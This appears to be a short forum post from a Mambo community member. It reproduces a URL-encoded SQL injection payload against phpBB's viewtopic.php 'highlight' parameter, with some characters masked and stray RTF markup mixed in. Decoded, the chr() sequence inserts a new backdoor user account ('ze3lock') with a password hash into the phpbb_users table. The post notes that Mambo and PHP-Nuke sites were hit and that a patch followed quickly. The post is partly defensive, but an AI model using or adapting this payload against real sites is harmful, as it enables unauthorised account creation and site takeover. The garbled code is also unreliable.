Code:
http://www.web-site-to-exploit-here.com{\rt**\***\deff0\deflang***33{\font***l{\f0\***swiss MS Sans Serif;}}\view*i****\uc1\pard\f0\fs17/forum/viewtopic.php?t=30&highlight=%***7%252emysql_query
(chr(73)%252echr(7%252echr(83)%252echr(69)%252echr(82)%252echr(84)%
252echr(32)%252echr(73)****%252echr(7%2***hr(84)%252echr(79)%252echr(*****
252echr(112)%252echr(104)%252echr(112)%252echr(9%252echr(9%252echr(95)%
252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(115)%252echr(
40)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(95)%252echr(
105)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%
252echr(95)%252echr(97)%252echr(99)%252echr(116)%252echr(105)%252echr(118)%252echr(
101)%252echr(44)%252echr(117)%252echr(115)%252echr(101)%252echr(114)%252echr(110)%
252echr(97)%252echr(109)%252echr(101)%252echr(44)%252echr(117)%252echr(115)%252echr(
101)%252echr(114)%252echr(95)%252echr(112)%252echr(97)%252echr(115)%252echr(115)%252echr(
119)%252echr(111)%252echr(114)%252echr(100)%252echr(44)%252echr(117)%252echr(115)%252echr(
101)%252echr(114)%252echr(95)%252echr(108)%252echr(101)%252echr(118)%252echr(101)%252echr(
108)%252echr(41)%252echr(32)%252echr(86)%252echr(65)%252echr(76)%252echr(85)%252echr(69)%252echr(
83)%252echr(32)%252echr(40)%252echr(39)%252echr(57)%252echr(57)%252echr(57)%252echr(
57)%252echr(57)%252echr(39)%252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(
44)%252echr(39)%252echr(122)%252echr(101)%252echr(51)%252echr(108)%252echr(
111)%252echr(99)%252echr(107)%252echr(39)%252echr(44)%252echr(39)%
252echr(9%252echr(97)%252echr(51)%252echr(99)%25*********
51)%252echr(51)%252echr(52)%252echr(56)%252echr(9%252echr(
100)%252echr(100)%252echr(102)%252echr(55)%252echr(9%252echr(51)%
252echr(54)%252echr(56)%252echr(9%252echr(52)%252echr(55)%
252echr(56)%252echr(97)%252echr(99)%252echr(4%252echr(54)%252echr(100)%
252echr(51)%252echr(51)%252echr(52)%252echr(4%252echr(101)%252echr(39)%
252echr(44)%252echr(39)%252echr(49)%252echr(39)%252echr(41))%252e%2527
\par}
^^ added "asterisks" on the string. its how the string looks like(without the ommited chars and astereisks and line breaks.. made line breaks so that the page wont scroll sideways.
this must be one that HIT you. it also has its php-nuke counter part.. and darn the we (from mambo portal open source community) was also a target of this.. grrr... too lame.. 2 days after this exploiter was released publicly.. mambo cummunity already has its security patch. ("<)
guilliam